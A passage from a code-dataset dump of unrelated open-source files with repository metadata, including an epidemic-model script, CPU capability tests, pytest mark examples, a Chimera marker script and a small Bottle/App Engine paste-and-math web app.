                              (package_prefix + '.' + modname,), RuntimeWarning)
                package_ref = dir(module)
            for item in package_ref:
                if item.startswith('_') and skip_single_underscores:
                    continue
                try:
                    locals_[item] = getattr(module, item)
                except AttributeError:
                    if fail_on_attributerror:
                        raise
                else:
                    if item not in all_:
                        all_.append(item)
|
[
"[email protected]"
] | |
9891353f85074b0ed1070e11d7f0e2ad93f4360b
|
2903ac66369b6bd45889b12629d8c8e34e6089b3
|
/frappe_training/frappe_training/doctype/employee_info/employee_info.py
|
6af4951315fdbdbbedc4214387b383397fcc6ffd
|
[
"MIT"
] |
permissive
|
sivaranjanipalanivel/training
|
6fa50b5f97fb00894404fba11122599fd796623c
|
b177c56a319c07dc3467ce3113e332ecee9b81fa
|
refs/heads/master
| 2023-07-17T06:11:29.894363 | 2021-08-02T14:47:31 | 2021-08-02T14:47:31 | 391,987,470 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 265 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2021, valiantsystems and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class EmployeeINFO(Document):
    """Frappe server-side controller for the Employee Info DocType.

    No custom server-side behaviour yet; the framework-provided Document
    lifecycle (validate/save/submit) applies unchanged.
    """
    pass
|
[
"[email protected]"
] | |
3db5cbd10cb5bc80f423f1f094adf67a4921cb7c
|
6b1be23ee65447932c387dc62f556ef8b2097154
|
/oblig3/SIRV_optimal_duration.py
|
469e098879045c7a4119170062e0db19908c8681
|
[] |
no_license
|
Linueks/inf1100
|
fd9fb4e0f338d387aa6d06430a5e484cc4037c8d
|
0a4a23144fd047bd3b51c44905e6c78754a053a6
|
refs/heads/main
| 2023-02-20T19:47:21.264189 | 2021-01-23T13:29:02 | 2021-01-23T13:29:02 | 332,216,763 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,769 |
py
|
from SIRV_varying_p import ProblemSIRV, SolverSIRV
import matplotlib.pyplot as plt
def optimal_duration():
    """Return the peak number of infected for vaccination campaigns of 0..30 days.

    For each campaign length, vaccination runs at rate p=0.1 starting on day 6;
    the SIRV model is solved over 60 days with a time step of 0.5.
    """
    maximum_I = []
    time_points = range(0, 31, 1)
    for time in time_points:
        optimal_duration_problem = ProblemSIRV(p = lambda t: 0.1 if 6 <= t <= 6 + time else 0,
                                beta=0.0005, v=0.1, S0=1500, I0=1, R0=0, V0=0, T=60)
        optimal_duration_sim = SolverSIRV(optimal_duration_problem, 0.5)
        optimal_duration_sim.solve()
        # Record the peak of I(t) for this campaign length.
        maximum_I.append(optimal_duration_sim.calc_max())
    return maximum_I
def plot(values):
    """Plot the peak number of infected against the vaccination duration (days)."""
    durations = list(range(len(values)))
    plt.plot(durations, list(values))
    plt.show()
if __name__ == '__main__':
    plot(optimal_duration())
    # NOTE: Python 2 print statement -- this script predates Python 3.
    print optimal_duration()
"""
The number of infected converges to 441 after 9 days of vaccination, when beta=0.0005
[Linueks@localhost oblig3]$ python SIRV_optimal_duration.py
[877.35589758894105, 764.25790220192289, 669.12776810141145, 591.69267415980698,
532.47707953201677, 490.46684184740479, 462.89122901853545, 447.73309998415226,
441.94995442418212, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926, 441.57841906399926,
441.57841906399926, 441.57841906399926, 441.57841906399926]
"""
|
[
"[email protected]"
] | |
da568daf9fc7b5f7c51214728a20aade8ee98fae
|
7a17f06fc65106e793ad8e23612d32266f14b1dc
|
/tests/cp2/test_cp2_cjalr_delay_2.py
|
8940dcd76c1dc9c9d6d9555a7ba9951f47cf1f4c
|
[
"LicenseRef-scancode-beri-hw-sw-1.0"
] |
permissive
|
capt-hb/cheritest
|
19eda13df15aeba0003e550d97000827090f382a
|
dacc190eed70261e51a8a438203f680dc52a95c0
|
refs/heads/master
| 2023-01-19T20:05:40.020021 | 2020-06-11T07:51:26 | 2020-06-11T07:51:26 | 238,688,997 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,628 |
py
|
#-
# Copyright (c) 2018 Alex Richardson
# All rights reserved.
#
# This software was developed by the University of Cambridge Computer
# Laboratory as part of the Rigorous Engineering of Mainstream Systems (REMS)
# project, funded by EPSRC grant EP/K008528/1.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase, attr
@attr('capabilities')
class test_cp2_cjalr_delay_2(BaseBERITestCase):
    """Checks CJALR/JALR link visibility in and after the branch-delay slot."""
    def test_cjalr_return_cap_in_delay_slot(self):
        '''Test that the new value of $c17 is available in the delay slot'''
        self.assertRegisterEqual(self.MIPS.c4.offset, self.MIPS.t0 - 8, "return address offset wrong")
        self.assertCapabilitiesEqual(self.MIPS.c4, self.MIPS.c17, "storing $c17 in the delay slot should yield the link address")
    def test_cjalr_return_cap_after_delay_slot(self):
        '''Test that $c17 still holds the link address after the delay slot'''
        self.assertRegisterEqual(self.MIPS.c5.offset, self.MIPS.t0 - 8, "return address offset wrong")
        self.assertRegisterEqual(self.MIPS.c17.offset, self.MIPS.t0 - 8, "return address offset wrong")
    def test_cjalr_jump_cap_after_delay_slot(self):
        '''Test that CJALR leaves the jump-target capability untouched'''
        self.assertRegisterEqual(self.MIPS.c6.offset, self.MIPS.t0, "jump cap modified by cjalr?")
        self.assertRegisterEqual(self.MIPS.c12.offset, self.MIPS.t0, "jump cap modified by cjalr?")
    def test_jalr_return_addr_in_delay_slot(self):
        '''Test that the new value of $ra is available in the delay slot'''
        self.assertRegisterEqual(self.MIPS.a0, self.MIPS.t9 - 8, "return address wrong")
    def test_jalr_return_addr_after_delay_slot(self):
        '''Test that $ra still holds the link address after the delay slot'''
        self.assertRegisterEqual(self.MIPS.a1, self.MIPS.t9 - 8, "return address wrong")
    def test_jalr_jump_addr_after_delay_slot(self):
        '''Test that JALR leaves the jump-target register untouched'''
        self.assertRegisterEqual(self.MIPS.a2, self.MIPS.t9, "jump address modified by jalr?")
|
[
"[email protected]"
] | |
a5133468f1e3ac2b8f5cff07596ef2a408f55caf
|
90047daeb462598a924d76ddf4288e832e86417c
|
/third_party/WebKit/Source/build/scripts/make_element_lookup_trie.py
|
89b0d36b65ea2270b86f8b56a979d0c65b744131
|
[
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0"
] |
permissive
|
massbrowser/android
|
99b8c21fa4552a13c06bbedd0f9c88dd4a4ad080
|
a9c4371682c9443d6e1d66005d4db61a24a9617c
|
refs/heads/master
| 2022-11-04T21:15:50.656802 | 2017-06-08T12:31:39 | 2017-06-08T12:31:39 | 93,747,579 | 2 | 2 |
BSD-3-Clause
| 2022-10-31T10:34:25 | 2017-06-08T12:36:07 | null |
UTF-8
|
Python
| false | false | 3,206 |
py
|
#!/usr/bin/env python
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import json5_generator
import trie_builder
import template_expander
class ElementLookupTrieWriter(json5_generator.Writer):
    """Generates {Namespace}ElementLookupTrie.{h,cpp}: a length-bucketed trie
    mapping tag names to elements, built from a json5 element list."""
    # FIXME: Inherit all these from somewhere.
    default_parameters = {
        'JSInterfaceName': {},
        'constructorNeedsCreatedByParser': {},
        'interfaceName': {},
        'noConstructor': {},
        'runtimeEnabled': {},
    }
    default_metadata = {
        'attrsNullNamespace': None,
        'export': '',
        'fallbackInterfaceName': '',
        'fallbackJSInterfaceName': '',
        'namespace': '',
        'namespacePrefix': '',
        'namespaceURI': '',
    }
    def __init__(self, json5_file_paths):
        # Collect every tag name and derive output file names from the
        # namespace declared in the json5 metadata.
        super(ElementLookupTrieWriter, self).__init__(json5_file_paths)
        self._tags = {}
        for entry in self.json5_file.name_dictionaries:
            self._tags[entry['name']] = entry['name']
        self._namespace = self.json5_file.metadata['namespace'].strip('"')
        self._outputs = {
            (self._namespace + 'ElementLookupTrie.h'): self.generate_header,
            (self._namespace + 'ElementLookupTrie.cpp'): self.generate_implementation,
        }
    @template_expander.use_jinja('ElementLookupTrie.h.tmpl')
    def generate_header(self):
        # Template context for the .h file.
        return {
            'namespace': self._namespace,
        }
    @template_expander.use_jinja('ElementLookupTrie.cpp.tmpl')
    def generate_implementation(self):
        # Template context for the .cpp file; tries are grouped by name length.
        return {
            'namespace': self._namespace,
            'length_tries': trie_builder.trie_list_by_str_length(self._tags)
        }
if __name__ == '__main__':
    # Standard Blink code-generator entry point: parse args, write outputs.
    json5_generator.Maker(ElementLookupTrieWriter).main()
|
[
"[email protected]"
] | |
479010e4fad3411f3a48f4aa6eaecd7dc3742c2c
|
711756b796d68035dc6a39060515200d1d37a274
|
/output_cog/optimized_19878.py
|
19e72df929151a150c4f3942a521b27edb39e709
|
[] |
no_license
|
batxes/exocyst_scripts
|
8b109c279c93dd68c1d55ed64ad3cca93e3c95ca
|
a6c487d5053b9b67db22c59865e4ef2417e53030
|
refs/heads/master
| 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,835 |
py
|
import _surface
import chimera
try:
    import chimera.runCommand
except:
    pass
from VolumePath import markerset as ms
try:
    from VolumePath import Marker_Set, Link
    new_marker_set = Marker_Set
except:
    from VolumePath import volume_path_dialog
    d = volume_path_dialog(True)
    new_marker_set = d.new_marker_set

marker_sets = {}
surf_sets = {}

# One row per marker: (marker-set name, (x, y, z) position, RGB colour, radius).
# Driving a single loop from this table reproduces the original hand-unrolled
# script exactly: same sets, same positions, same colours, same order.
_MARKER_TABLE = [
    ("Cog2_GFPN", (556.085, 428.39, 469.706), (0.89, 0.1, 0.1), 18.4716),
    ("Cog2_0", (522.683, 408.322, 528.049), (0.89, 0.1, 0.1), 17.1475),
    ("Cog2_1", (491, 389.643, 599.764), (0.89, 0.1, 0.1), 17.1475),
    ("Cog2_GFPC", (614.33, 456.002, 591.264), (0.89, 0.1, 0.1), 18.4716),
    ("Cog2_Anch", (391.952, 311.915, 747.316), (0.89, 0.1, 0.1), 18.4716),
    ("Cog3_GFPN", (539.587, 406.108, 506.89), (1, 1, 0), 18.4716),
    ("Cog3_0", (539.93, 405.777, 506.221), (1, 1, 0.2), 17.1475),
    ("Cog3_1", (567.991, 403.819, 507.598), (1, 1, 0.2), 17.1475),
    ("Cog3_2", (591.705, 391.342, 499.042), (1, 1, 0.2), 17.1475),
    ("Cog3_3", (577.872, 382.64, 476.166), (1, 1, 0.2), 17.1475),
    ("Cog3_4", (594.472, 360.934, 482.623), (1, 1, 0.2), 17.1475),
    ("Cog3_5", (597.449, 334.717, 492.222), (1, 1, 0.2), 17.1475),
    ("Cog3_GFPC", (534.085, 420.47, 482.884), (1, 1, 0.4), 18.4716),
    ("Cog3_Anch", (655.571, 245.945, 498.176), (1, 1, 0.4), 18.4716),
    ("Cog4_GFPN", (511.374, 221.618, 637.706), (0, 0, 0.8), 18.4716),
    ("Cog4_0", (511.374, 221.618, 637.706), (0, 0, 0.8), 17.1475),
    ("Cog4_1", (510.236, 247.271, 624.959), (0, 0, 0.8), 17.1475),
    ("Cog4_2", (507.143, 273.61, 614.12), (0, 0, 0.8), 17.1475),
    ("Cog4_3", (500.039, 298.984, 603.06), (0, 0, 0.8), 17.1475),
    ("Cog4_4", (500.748, 319.493, 583.238), (0, 0, 0.8), 17.1475),
    ("Cog4_5", (511.7, 338.732, 565.417), (0, 0, 0.8), 17.1475),
    ("Cog4_6", (512.483, 357.398, 543.873), (0, 0, 0.8), 17.1475),
    ("Cog4_GFPC", (656.08, 162.675, 633.89), (0, 0, 0.8), 18.4716),
    ("Cog4_Anch", (374.608, 552.516, 441.659), (0, 0, 0.8), 18.4716),
    ("Cog5_GFPN", (477.089, 361.632, 561.702), (0.3, 0.3, 0.3), 18.4716),
    ("Cog5_0", (477.089, 361.632, 561.702), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_1", (496.418, 361.684, 583.889), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_2", (518.501, 373.153, 599.897), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_3", (521.414, 402.442, 604.565), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_GFPC", (575.91, 465.22, 510.457), (0.3, 0.3, 0.3), 18.4716),
    ("Cog5_Anch", (463.021, 354.292, 703.605), (0.3, 0.3, 0.3), 18.4716),
    ("Cog6_GFPN", (542.933, 427.935, 530.159), (0.21, 0.49, 0.72), 18.4716),
    ("Cog6_0", (542.954, 427.971, 530.161), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_1", (523.824, 435.564, 509.471), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_2", (507.689, 413.631, 499.407), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_3", (516.064, 389.242, 488.125), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_4", (536.362, 369.807, 486.536), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_5", (546.828, 344.117, 481.772), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_6", (569.164, 327.702, 476.702), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_GFPC", (489.108, 356.777, 483.147), (0.21, 0.49, 0.72), 18.4716),
    ("Cog6_Anch", (652.389, 300.145, 473.049), (0.21, 0.49, 0.72), 18.4716),
    ("Cog7_GFPN", (466.901, 390.5, 505.552), (0.7, 0.7, 0.7), 18.4716),
    ("Cog7_0", (482.232, 398.256, 525.075), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_1", (516.21, 416.998, 567.358), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_2", (550.267, 435.765, 609.783), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_GFPC", (559.526, 500.618, 561.588), (0.7, 0.7, 0.7), 18.4716),
    ("Cog7_Anch", (588.271, 413.593, 704.678), (0.7, 0.7, 0.7), 18.4716),
    ("Cog8_0", (508.91, 435.368, 474.056), (1, 0.5, 0), 17.1475),
    ("Cog8_1", (489.93, 441.714, 494.499), (1, 0.5, 0), 17.1475),
    ("Cog8_2", (479.357, 436.253, 520.525), (1, 0.5, 0), 17.1475),
    ("Cog8_3", (469.575, 432.37, 547.203), (1, 0.5, 0), 17.1475),
    ("Cog8_4", (461.879, 427.467, 574.552), (1, 0.5, 0), 17.1475),
    ("Cog8_5", (457.673, 421.373, 602.613), (1, 0.5, 0), 17.1475),
    ("Cog8_GFPC", (498.031, 418.352, 533.785), (1, 0.6, 0.1), 18.4716),
    ("Cog8_Anch", (418.154, 422.745, 675.418), (1, 0.6, 0.1), 18.4716),
]

for _mname, _xyz, _rgb, _radius in _MARKER_TABLE:
    if _mname not in marker_sets:
        s = new_marker_set(_mname)
        marker_sets[_mname] = s
    s = marker_sets[_mname]
    mark = s.place_marker(_xyz, _rgb, _radius)

for k in surf_sets.keys():
    chimera.openModels.add([surf_sets[k]])
|
[
"[email protected]"
] | |
92e7550f33ce661e0dfbc7c4973a08bffc0e7f60
|
f177033785079d752502a6f91035e645b52d6416
|
/env/lib/python3.7/enum.py
|
feea8108d76bd633dc5f062b86b413107e416625
|
[] |
no_license
|
ousamasama/Django-Exercise-14
|
18d00d563e29df7804664ac33cd1de5966a10126
|
ecd023c2915e5c3b85614d857c916cd6a2b36316
|
refs/heads/master
| 2020-04-17T19:40:05.540532 | 2019-01-24T21:22:32 | 2019-01-24T21:22:32 | 166,873,826 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 55 |
py
|
/Users/sama/.pyenv/versions/3.7.1/lib/python3.7/enum.py
|
[
"[email protected]"
] | |
891f93e7f6991eb5a01701d37ad594831e3e606d
|
468eacfd3e5e20e15ba4c98a136ff6aca4431a73
|
/Labs/oop-1-employees.py
|
f6e9c036c60148fddabccfd73e0aa4f5cdca2148
|
[] |
no_license
|
DREAMS-lab/SES230-Coding-for-Exploration
|
b9888d837472efa33bc6047faa8ffd1fce00cb43
|
f799b6c2fe7f199fed5dc33f2f6e69ca2e06dbc9
|
refs/heads/master
| 2023-01-07T20:54:04.465586 | 2020-11-11T16:56:01 | 2020-11-11T16:56:01 | 312,028,818 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 746 |
py
|
class Employee:
    """A simple employee record: private name, public job title and salary."""

    def __init__(self, _name='John Doe', _title='nothing', _salary=0):
        self.__name = _name      # private; read back via get_name()
        self.title = _title
        self.salary = _salary

    def __str__(self):
        return '{} {} {}'.format(self.__name, self.title, self.salary)

    def get_name(self):
        """Return the employee's name."""
        return self.__name

    def set_salary(self, _salary):
        """Replace the employee's salary."""
        self.salary = _salary
# Demo: a default-constructed employee, then a small roster printed by name.
employee3 = Employee()
print(employee3)
scrooge_and_marley_employees = [(Employee("Bob Cratchit", 'clerk', 15)), (Employee('Ebenezer', 'founder', 1000))]
for employee in scrooge_and_marley_employees:
    print(employee.get_name())
|
[
"[email protected]"
] | |
13f6a301539f7a1edd24c3d259ad5391980283c4
|
4d40ea521582b88a8373845cd47c94c2fdd3125c
|
/src/chapter3/test_marks.py
|
b7eca7c90cb009bd26faa006a0ed26bee72803e4
|
[] |
no_license
|
lancelote/pytest-quick-start-guide
|
a74d01ae322f798e7e1fa4f54ad2432f42d6747f
|
b76f515b5f4034f195b294e4e13befbad4790d1b
|
refs/heads/master
| 2020-03-29T14:19:17.725110 | 2018-11-07T10:01:31 | 2018-11-07T10:01:31 | 150,010,679 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 638 |
py
|
import pytest
# A single mark applied via decorator.
@pytest.mark.slow
def test_long_computation():
    pass
# A parameterized mark (pytest-timeout plugin arguments).
@pytest.mark.timeout(10, method='thread')
def test_topology_sort():
    pass
# Marks stack: this test carries both `slow` and `timeout`.
@pytest.mark.slow
@pytest.mark.timeout(10, method='thread')
def test_topology_sort_slow():
    pass
# A mark object can be stored and reused as a plain decorator.
timeout10 = pytest.mark.timeout(10, method='thread')
@timeout10
def test_topology_sort_deco():
    pass
@timeout10
def test_remove_duplicate_point():
    pass
# Decorating a class applies the mark to every test method inside it.
@timeout10
class TestCase:
    def test_simple_simulation(self):
        pass
    def test_compute_tracers(self):
        pass
# To apply a mark to a module
pytestmark = [pytest.mark.slow, pytest.mark.timeout(10)]
|
[
"[email protected]"
] | |
120fce3b3efd1034b3432b64e7fb3e599460cce4
|
f67986550761cf3ed174d01063f5fdc8a26f59f3
|
/vision/modules/YellowBuoy.py
|
8f6cbc2d3f99cd730e91568440d78e8e8c8c7b08
|
[
"BSD-3-Clause"
] |
permissive
|
wpfhtl/software
|
4dd5d116a1c90660264b32006617a6809b0a530e
|
575d424be6b497e0f34f7297a9b322567c2e26c0
|
refs/heads/master
| 2021-01-23T02:40:49.542461 | 2016-04-15T04:16:21 | 2016-04-15T04:16:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 856 |
py
|
import shm
from vision.modules import ModuleBase, buoy_common
from vision import options
# Camera stream this module consumes.
capture_source = 'forward'
# Tunable color/shape thresholds for the yellow buoy detector.
# NOTE(review): this list rebinds the name `options`, shadowing the imported
# `vision.options` module (the RHS is evaluated first, so the calls still work).
options = [options.IntOption('hls_h_min', 105, 0, 255),
           options.IntOption('hls_h_max', 143, 0, 255),
           options.IntOption('lab_a_min', 127, 0, 255),
           options.IntOption('lab_a_max', 235, 0, 255),
           options.IntOption('lab_b_min', 3, 0, 255),
           options.IntOption('lab_b_max', 123, 0, 255),
           options.IntOption('min_area', 100, 0, 1000000),
           options.DoubleOption('min_circularity', 0.5, 0, 1),
           options.BoolOption('verbose', False)
          ]
class YellowBuoy(ModuleBase.ModuleBase):
    """Vision module that locates the yellow buoy in the forward camera feed."""
    def __init__(self, logger):
        # `options` is the module-level list defined above.
        # NOTE(review): `logger` is accepted but never used — confirm intended.
        super(YellowBuoy, self).__init__(options, True)
    def process(self, mat):
        # Delegate to the shared buoy pipeline, publishing into shm.
        buoy_common.process(self, mat, shm.yellow_buoy_results)
|
[
"[email protected]"
] | |
4e050d2bbdac743366012d0ff8e56b35566b6b0e
|
bbc7d39cea6dadae9b2ffb114c8474c9c3b6d305
|
/main.py
|
885f10bc222b0b9e40e7bbd1e9cc7f2d1ce9c6d6
|
[] |
no_license
|
jfriedly/paste-math
|
0018890c5bab2dd31a817a3aca6ac020c7e9613c
|
0b171433fee5aefd562cfd730f969cf931ce86c1
|
refs/heads/master
| 2021-01-16T00:49:49.269091 | 2013-02-19T22:34:48 | 2013-02-19T22:34:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,623 |
py
|
from lib import bottle
from lib.bottle import route, template, request, error, debug, static_file
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api.app_identity import get_default_version_hostname
import lib.db
from lib.html import addLineBreaks
from google.appengine.api import users
import datetime
import logging
today=datetime.datetime.today
class Object():
    # Bare attribute container; used below as a stand-in "page" record when a
    # database lookup returns nothing.
    pass
@route('/')
def index():
    """Front page: published pages for visitors, full page list for admins."""
    if not users.is_current_user_admin():
        q = lib.db.q("SELECT * FROM Page WHERE published = True ORDER BY timestamp DESC")
        #q = lib.db.Page.all()
        result = [[p.url, p.title] for p in q.run()]
        output = template('templates/index', rows=result, users=users)
    else:
        #result = lib.db.q("SELECT * FROM Page")
        q = lib.db.Page.all()
        q.order('-timestamp')
        todo = lib.db.Todo.all()
        # Admins also see the published flag and the ToDo list.
        result = [[p.url, p.title, p.published] for p in q.run()]
        output = template('templates/admin', rows=result, users=users, todo=todo)
    return output
@route('/show/:name')
def show(name):
    """Render a page by its url slug using the editable 'show' template."""
    # NOTE(review): this admin check is a no-op (`pass` either way) — confirm
    # whether an access restriction was intended here.
    if not users.is_current_user_admin():
        pass
    q = lib.db.Page.gql("WHERE url = :1", name)
    p = q.get()
    if not p:
        # Fall back to a placeholder record instead of a 404.
        p = Object()
        p.title = "Unknown Page"
        p.content = "This page does not exist."
    title = p.title
    content = addLineBreaks(p.content)
    return template('templates/show_page.tpl', title=title, body=content)
    #content = convertList(lst)
@route('/view/:name')
def view(name):
    """Render a page by its url slug using the read-only 'view' template."""
    q = lib.db.Page.gql("WHERE url = :1", name)
    p = q.get()
    if not p:
        p = Object()
        p.title = "Unknown Page"
        p.content = "This page does not exist."
    title = p.title
    content = addLineBreaks(p.content)
    return template('templates/view_page.tpl', title=title, body=content)
    #content = convertList(lst)
@route('/new', method='GET')
def new():
    """Render the page-creation form (with live preview)."""
    return template('templates/new_preview.tpl')
@route('/new', method='POST')
def new_post():
    """Create a new Page from the submitted form.

    The 'save' button stores a draft (published=False); 'publish' stores it
    live (published=True). The original duplicated the whole body per button;
    the two paths differed only in the published flag, so they are merged.
    Returns the submit confirmation page, or None if neither button was sent
    (matching the original fall-through behavior).
    """
    if request.POST.get('save', '').strip():
        published = False    # draft
    elif request.POST.get('publish', '').strip():
        published = True     # live immediately
    else:
        return None          # neither button present (original implicit None)
    title = request.POST.get('title', '').strip()
    data = request.POST.get('data', '').strip()
    url = lib.db.getUrlString()
    lib.db.Page(title=title, content=data, url=url, published=published, timestamp=today()).put()
    message = '<p>The new page was inserted into the database, \
        the ID is %s</p>' % (url)
    return template('templates/submit.tpl', body=message,
            data=addLineBreaks(data), title=title, url=url)
# NOTE(review): these handlers reuse the names `new`/`new_post`, shadowing the
# /new handlers above. Bottle dispatches by route, not by function name, so
# routing still works, but the earlier functions are no longer reachable by name.
@route('/todo', method='GET')
def new():
    """Render the form for adding a ToDo task (inline HTML, not a template)."""
    body = '''
    <p>Add a new task to the ToDo list:</p>
    <form action="/todo" method="POST">
    Title: <br>
    <input type="text" name="title"><br>
    Body: <br>
    <textarea name="data" cols="80" rows="20">
    </textarea>
    <br />
    <input type="submit" name="save" value="save">
    </form>
    '''
    return template('templates/simple.tpl', body=body)
@route('/todo', method='POST')
def new_post():
    """Store a submitted ToDo task; new tasks start in the open state."""
    if request.POST.get('save','').strip():
        title = request.POST.get('title', '').strip()
        data = request.POST.get('data', '').strip()
        lib.db.Todo(title=title, content=data, open=True).put()
        message = '<p>The new task was inserted into the database</p>'
        return template('templates/simple.tpl', body=message)
@route('/edit/:name', method='GET')
def edit(name):
    """Render the edit form for the page with url slug *name*.

    An unknown slug yields an empty form rather than an error.
    """
    q = lib.db.Page.gql("WHERE url = :1", name)
    p = q.get()
    if not p:
        p = Object()
        p.title = ""
        p.content = ""
    title = p.title
    content = p.content
    #lib.db.d(p)
    return template('templates/edit_preview.tpl', name=name, body=content, url=name, title=title, data=addLineBreaks(content))
#@route('/edit_old/:name', method='GET')
#def edit(name):
#    q = lib.db.Page.gql("WHERE url = :1", name)
#    p = q.get()
#    title = p.title
#    content = p.content
#    return template('templates/edit_active.tpl', name=name, body=content, url=name, title=title)
@route('/edit/:name', method='POST')
def edit_post(name):
    """Save or publish edits to the page with url slug *name*.

    'save' writes a draft (published=False), 'publish' writes it live
    (published=True). The original duplicated the whole body per button;
    only the published flag differed, so the two paths are merged.
    A new Page entity is written either way (as in the original — note this
    inserts rather than updating in place when the url is unchanged).
    Returns the submit confirmation page, or None if neither button was sent.
    """
    if request.POST.get('save', '').strip():
        published = False
    elif request.POST.get('publish', '').strip():
        published = True
    else:
        return None          # neither button present (original implicit None)
    title = request.POST.get('title', '').strip()
    data = request.POST.get('data', '').strip()
    url = request.POST.get('url', '').strip()
    q = lib.db.Page.gql("WHERE url = :1", name)
    p = q.get()
    lib.db.d(p)
    if url == name:
        message = '<p>The ID %s was successfully updated</p>' % (url)
    else:
        message = '<p>The new task was inserted into the database, the ID is %s</p>' % (url)
    lib.db.Page(title=title, content=data, url=url, published=published, timestamp=today()).put()
    return template('templates/submit.tpl', body=message,
            data=addLineBreaks(data), title=title, url=url)
@route('/help')
def help():
    """Serve the static help page.

    BUG FIX: the original called static_file(...) without returning its
    result, so the route always produced an empty response; bottle handlers
    must return the response object.
    """
    # NOTE(review): this function also shadows the builtin help(); renaming is
    # safe for routing but left as-is to avoid touching other references.
    return static_file('help.html', root='.')
@route('/static/<filename>')
def static(filename):
    """Serve files from the local 'static' directory."""
    return static_file(filename, root='static')
@route('/json:json#[1-9]+#')
def show_json(json):
    """Return the paste with the given id as a JSON dict.

    Fixes two latent bugs in the original handler:
    - ``sqlite3`` was never imported, so the route raised NameError when hit.
    - the bind parameters were written as ``(json)`` — a bare string, which
      sqlite3 treats as a sequence of single characters; it must be the
      1-tuple ``(json,)``.
    The connection is now also closed instead of leaked.
    """
    import sqlite3  # local import: only this legacy handler touches sqlite
    conn = sqlite3.connect('math.db')
    try:
        c = conn.cursor()
        c.execute("SELECT data FROM paste WHERE id LIKE ?", (json,))
        result = c.fetchall()
        c.close()
    finally:
        conn.close()
    if not result:
        return {'task': 'This item number does not exist!'}
    else:
        return {'Task': result[0]}
def main():
    """App entry point: enable debug on the dev server, install error pages,
    and hand the bottle app to App Engine's WSGI runner."""
    #Find a way to check if dev server.
    if get_default_version_hostname() == 'localhost:8080':
        debug(True)
    else:
        @error(500)
        def Error500(code):
            logging.error('There was an internal server error')
            message = 'Internal Server Error'
            return template('templates/simple.tpl', body=message)
        # NOTE(review): run_wsgi_app is only reached on the non-dev branch,
        # and the 403/404 handlers below are registered *after* it is called —
        # confirm this ordering is intentional.
